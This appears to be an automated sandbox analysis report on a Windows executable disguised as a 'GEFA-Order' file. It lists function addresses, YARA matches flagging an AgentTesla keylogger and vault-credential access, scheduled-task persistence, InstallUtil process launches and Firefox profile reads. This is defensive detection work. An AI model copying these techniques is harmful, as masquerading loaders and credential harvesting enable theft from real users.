                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F18E610_2_06F18E61
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F1D6680_2_06F1D668
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F184100_2_06F18410
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F1C3870_2_06F1C387
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F100400_2_06F10040
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F100060_2_06F10006
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F51C820_2_06F51C82
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F500400_2_06F50040
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F500060_2_06F50006
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_071ED6B00_2_071ED6B0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_071D00060_2_071D0006
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_071D00400_2_071D0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_01384A601_2_01384A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_01389C621_2_01389C62
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0138CF281_2_0138CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_01383E481_2_01383E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_013841901_2_01384190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A56B01_2_064A56B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A00401_2_064A0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A3F281_2_064A3F28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064ABCC81_2_064ABCC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A2AE81_2_064A2AE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A8B5A1_2_064A8B5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064ADBF81_2_064ADBF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A321B1_2_064A321B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064A4FD01_2_064A4FD0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0260CE7C3_2_0260CE7C
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0619F3703_2_0619F370
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06199D983_2_06199D98
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0619A9803_2_0619A980
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0619F3603_2_0619F360
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0619A9713_2_0619A971
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061951D83_2_061951D8
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BC7883_2_061BC788
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B142C3_2_061B142C
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BD4D03_2_061BD4D0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B00403_2_061B0040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BC8343_2_061BC834
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BC77E3_2_061BC77E
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BB7B03_2_061BB7B0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BB7A13_2_061BB7A1
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B427F3_2_061B427F
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B42903_2_061B4290
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B600D3_2_061B600D
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B00063_2_061B0006
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B60303_2_061B6030
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B30B03_2_061B30B0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061B30C03_2_061B30C0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_061BCA333_2_061BCA33
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0630FE393_2_0630FE39
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06305F603_2_06305F60
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06305F523_2_06305F52
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063384203_2_06338420
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0633C0503_2_0633C050
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06338E703_2_06338E70
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06338E613_2_06338E61
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0633D6683_2_0633D668
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06335F0D3_2_06335F0D
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063384103_2_06338410
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0633C3873_2_0633C387
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063300063_2_06330006
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063300403_2_06330040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063412323_2_06341232
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063409B83_2_063409B8
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0637003E3_2_0637003E
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_063700403_2_06370040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06371C823_2_06371C82
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0660D6B03_2_0660D6B0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_065F00403_2_065F0040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_065F00063_2_065F0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD41904_2_00DD4190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD4A604_2_00DD4A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD9C634_2_00DD9C63
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD3E484_2_00DD3E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDCF284_2_00DDCF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0551AD804_2_0551AD80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_055195344_2_05519534
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_0152CE7C7_2_0152CE7C
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AEF3707_2_06AEF370
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AE9D987_2_06AE9D98
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AEA9807_2_06AEA980
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AEF3607_2_06AEF360
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AE91C97_2_06AE91C9
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AE51D87_2_06AE51D8
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06AEA9717_2_06AEA971
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0C7887_2_06B0C788
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0D4D07_2_06B0D4D0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0142C7_2_06B0142C
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B000407_2_06B00040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0C8347_2_06B0C834
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0B7B07_2_06B0B7B0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0B7A17_2_06B0B7A1
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0C77B7_2_06B0C77B
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B042907_2_06B04290
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0427F7_2_06B0427F
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B030B17_2_06B030B1
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B030BF7_2_06B030BF
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B030C07_2_06B030C0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B060307_2_06B06030
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B000067_2_06B00006
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0600D7_2_06B0600D
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06B0CA337_2_06B0CA33
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C55F537_2_06C55F53
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C55F607_2_06C55F60
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C884207_2_06C88420
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C8C0507_2_06C8C050
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C88E617_2_06C88E61
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C88E707_2_06C88E70
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C884107_2_06C88410
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C8C3877_2_06C8C387
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C800407_2_06C80040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06C800067_2_06C80006
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06CC1C827_2_06CC1C82
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06CC00407_2_06CC0040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06CC00077_2_06CC0007
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06F5D6B07_2_06F5D6B0
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06F400407_2_06F40040
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 7_2_06F400077_2_06F40007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_03154A608_2_03154A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0315CF288_2_0315CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_03153E488_2_03153E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_03159C688_2_03159C68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_031541908_2_03154190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0602AD808_2_0602AD80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_060295348_2_06029534
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.000000000342A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.000000000342A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZigzwtwkov.exe6 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAwndfiup.dll" vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1731922490.0000000006BE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAwndfiup.dll" vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000000.1657510996.0000000000F52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZigzwtwkov.exe6 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1736166624.0000000006F60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000032AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1714806608.000000000161E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.000000000440A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004261000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAwndfiup.dll" vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004261000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exeBinary or memory string: OriginalFilenameZigzwtwkov.exe6 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: GEFA-Order 232343-68983689.exe, Lgfcbewc.csCryptographic APIs: 'CreateDecryptor'
                    Source: Cbgoomiexw.exe.0.dr, Lgfcbewc.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.3475368.1.raw.unpack, Lgfcbewc.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeFile created: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: GEFA-Order 232343-68983689.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: GEFA-Order 232343-68983689.exeReversingLabs: Detection: 15%
                    Source: GEFA-Order 232343-68983689.exeVirustotal: Detection: 26%
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeFile read: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe "C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe"
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe "C:\Users\user\AppData\Roaming\Cbgoomiexw.exe"
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe "C:\Users\user\AppData\Roaming\Cbgoomiexw.exe"
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: kernel.appcore.dllJump to behavior
